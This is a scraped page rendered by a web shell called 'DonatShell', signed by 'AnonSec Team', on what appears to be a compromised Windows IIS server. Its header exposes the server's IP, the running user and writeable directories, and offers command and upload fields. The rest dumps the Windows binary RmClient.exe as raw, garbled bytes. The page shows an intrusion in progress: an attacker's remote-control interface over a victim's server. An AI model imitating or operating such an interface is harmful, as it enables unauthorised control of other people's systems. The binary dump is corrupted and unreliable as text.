DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.127
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/System32/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/System32/RmClient.exe
MZ@	!L!This program cannot be run in DOS mode.

$ӟa&uuuuuuuuuuuuuuuuuRichuPEL[J	&)@p*@ .dP(`(@`.text$& `.data@*@.rsrc(P
,@@.relocZ`6@B~[J0[J=[JGo[JT[J=ADVAPI32.dllntdll.DLLKERNEL32.dllmsvcrt.dllwʤww+w'wwۻw+wwķwwwww$wvwww`wfw]wDwwwPwDw#
wwvw5+ww(wB1w<w^w'o'o(oao'>oo]ooowooQo6ouo7o|Noo1w wP'(=*[J%ppF,$r$rR|a=B^NULLNULL<NULL> RmClient.exe pipename

ReceiveSendOpenPipeSpawnProcessMsgLoopwmainMicrosoft\Windows\RMClientxBBH@RSDSM
EO̘$RmClient.pdb+Ujuuj+uuM]̋UjjEPuuj+uu! ]̋UjjEPuuj+uu ]̋UVutƍP@u+@jX΅uLjPQuuj+uu ^]̋UVutƍP@u+@jX΅uLjjURPQuuj+uuP(^]̋UUSVWt#f:ujpf@@fu+\j
[t
f:u`T}tǍp@u+@jXυuLjSRPQuuj+uu(_^[]̋UQU S3VW;t*f9u	E #pf@@f;u+DE E 
;tf9u	E`UET};t"f9ujǍpf@@f;u+\j
[t
f?u`TUtp@u+@jXʅuLjjU$Ru uSWPQuuj+uu8_^[ ̋UVutƍP@u+@jX΅uLjjU RjURPQuuj+uu^0^]̋UVutƍP@u+@jX΅uLjjU$RjU RjURPQuuj+uu8^] ̋UU SVWt#f:ujpf@@fu+\j
[t
f:u`T}tǍp@u+@jXυuLjSRjURPQuuj+uu_0_^[]̋UE33҉H@HfPH]̋UQQE3SEVuWtHtjWXw33E&uRSUuESUNt ~tNQMVJNAt	vtM_WOG3_^[̋UQQV5@W8@)eNQjjMQjPVhE6u_^̋V5@W@;t*FNtQPff6uމ=@_^̋V5WW$pWWփ_^̋U$VW33u܍}૫3ɫAMuu9uv9ut}r}u0@=@t@thh<jppt3VQQVD};u7@=@t@t@P@hh<jppuSW<EPEPu}uu8@uB=t9@=@t%@tP@hh<jpp
u<Ejhu4EtX@=@t(@t"Pu@uWVj pp@}r=@tW@tQWVj!pp;@jEPEPu0u/@=@t@tP@WVj"ppIe.EMt@=@t@tQWVj#ppu,E[_^̋U$VW33u܍}૫3ɫAMuu9uv9ut}r}u0@=@t@thh<j$ppJ3VQQVD};u7@=@t@t@P@hh<j%ppKSW<EPEPu}uuH@uB=t9@=@t%@tP@hh<j&ppu<Ejhu4EtX@=@t(@t"Pu@uWVj'pp@}r=@tW@tQWVj(pp@jEPEPu0u/@=@t@tP@WVj)ppe.EMt@=@t@tQWVj*ppu,E[_^̋UMS3VWE;/f9&9E@<=@t@tQWVj,pp@E3Ph@jPPhuTEuq@=@t @tPu@WVj-pphP}r@=@t@tuWVj.ppj,E~jjMQPELu.@=@t@tP@WVj/ppu몋EM3@+@=@t@thh<j+pp3_^[̋UdES3ۉ]EE]9]C9]:9]19](}VWjD^VESP=3}૫uE<f9@@uAhh@@Xu-@=@tE@t @P@WVj1pp@=@t@tuWVj2ppEPEPh@@SuESSPuSuu9@E;t,@=@t@tuWVj3ppEEEMu5,u֋E_^4@=@t#@tuuhh<j0ppc[̋U$@3ʼnEESVWh3VPƅ	Dž<PjP3+HHtvHtA
)@=@@hWjpps@=@c@YhWjpp?A@=@t@tWjppd@0jpӋuj[+QPVu@=@td@t^hWjI;t@=@t:@t4hWj>t)@=@t@thWjppPj
dv@0jpӉuj[;vNQPPFvPd@0V5jpփtd@0jp,hjP1Džt
ωPjPuQ@=@t@thWjpp%Dž @=@t@tWjpp{@@;t)@t#jVWjpp@tG;t@tVWjppL@=@t:@t4hWjppV;t@tVWjppM_^3[̋U0@3ʼnES3ۃVW}@Vph8@,5@'SSjS`C}q@@f-tf/tf\uE=Qʃ?t'ht";t@tRh<j
pp#@DžC;]|399Pj_W\P$u/@;6@,@Phh<jQPPj u/@;@@Phh<jPPPPPSt<@;te@t_QQhh<j
pp42@;t)@t#@Phh<j@ppP,u(@;t@th<jpp/@;t@tWh<jppt,
.ϋM_^3[%̋UVu3utу;ur^]̡lBh\B5hB\BhLBhPBhHBXBjhH.3ۉ]dp]俠ESVW;t;u3FuhP3FE;u
jY;Eu,5Ehh#YYtE5dBE;uhh!YYE9]uSW9EthEYt
SjSE5LB5PB5HB`B9TBu7PE	MPQYYËeE`B39TBuP9dBuE`B̸MZf9t3M<8PEuHtuՃv39xtv39jTB!P
E
EYY
tB
pB{=@uh,YI3%;
@ur%̋UE8csmu+xu%@= t=!t="t=@u3]h)3%̋UMMZf9t3]ËA<8PEu3ҹf9H‹]̋UEH<ASVq3WDv}H;r	X;r
B(;r3_^[]jhh.eV\Yt=E+PVYYt+@$ЃE E3=ËeE3e%%h+d5D$l$l$+SVW@1E3PeuEEEEdËMd
Y__^[]Q̋Uuuuuh)h@L]hhYY3jh.L3MtDt?!EMZf9u+Q<|$s
E8PEt3@Ëe3EE?̋Ujt$Pt@\fujX]fu3@]ËE]̋U@eeSWN@;t
t	У@[VEPhu3ul3p3t3EP|E3E3;t@uO@5@։5@^_[̋U(xC
tCpClC5hC=dCfCf
Cf`Cf\Cf%XCf-TCCE|CECECBCBxB	|B@@jhxh	\Pd%((/+C+b,f,/04/1,/2/2/00,0D0Z0r000000011,1<1L1X1r1z1111333333l3X3:333d2t22222121P2B262.2 221122TraceMessage[GetTraceEnableFlags\GetTraceEnableLevel]GetTraceLoggerHandleRegisterTraceGuidsWUnregisterTraceGuids|CreateProcessAsUserWLookupAccountSidWZGetTokenInformationOpenProcessTokenADVAPI32.dllRCloseHandle8GetOverlappedResultWaitForSingleObjectExReadFileResetEventGetLastErrorCreateEventW%WriteFile|SetNamedPipeHandleStateSleepCreateFileW|GetSystemWindowsDirectoryWGetCurrentProcessHeapSetInformationKERNEL32.dllpwprintfmemsetmemcpy__wgetmainargs_cexitb_exitj_XcptFilterexit_initterm_amsg_exit__setusermatherr__p__commode__p__fmode__set_app_typemsvcrt.dll7?terminate@@YAXXZY_except_handler4_common'_controlfpGRtlFreeHeapcRtlAllocateHeapntdll.dllInterlockedExchangeInterlockedCompareExchangeSetUnhandledExceptionFilterGetModuleHandleAQueryPerformanceCounterGetTickCountGetCurrentThreadIdGetCurrentProcessIdyGetSystemTimeAsFileTimeTerminateProcessUnhandledExceptionFilter@N@D(@Xp			`WSPMUI<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
    version="5.1.0.0"
    processorArchitecture="x86"
    name="Microsoft.Windows.RestartManager.RMClient"
    type="win32"
/>
<description>Restart Manager Restart Client</description>

<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
        <requestedPrivileges>
            <requestedExecutionLevel
                level="asInvoker"
                uiAccess="false"
            />
        </requestedPrivileges>
    </security>
</trustInfo>
</assembly>

4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft Corporationn#FileDescriptionRestart Manager LUA Restart Clientl&FileVersion6.1.7600.16385 (win7_rtm.090713-1255):
InternalNameRmClient.exe.LegalCopyright Microsoft Corporation. All rights reserved.B
OriginalFilenameRmClient.exej%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	E-fkJG
IT
}HC^Y1MUIMUIen-US00002 2d2h2[334 4F444
557555m6t66(757B77777778$858;8E8888888888889.949F9K9[9`9e999999999	:::':M:R:s::::::;	;;;";';>;X;^;p;u;;;;;;;;;;;<3<<<A<Q<w<|<<<<<<=(=5=:=M=g=r=w=======>
>>>>>>>>>>>>>>$?;?E?Q?V??????? /000000000!1t1y11111111P222223 3G3L3c3w3~3333&4R4]4c4g4m4}44444 5'505H5N5S55555556(6-6A6Q6W6\6c6666667Q7V7\7a7f7k7p7v7~77777777778"8+808=8N8T8[8o8u8{888888888888	99X9d9j9q9z9999999999.:>:D:R:::\;h;u;;;;<<<<<<==="=4=A=I=c=i=o=u={==================>>>!>,>3>@>\>`>|>>>>@0

Anon7 - 2022
AnonSec Team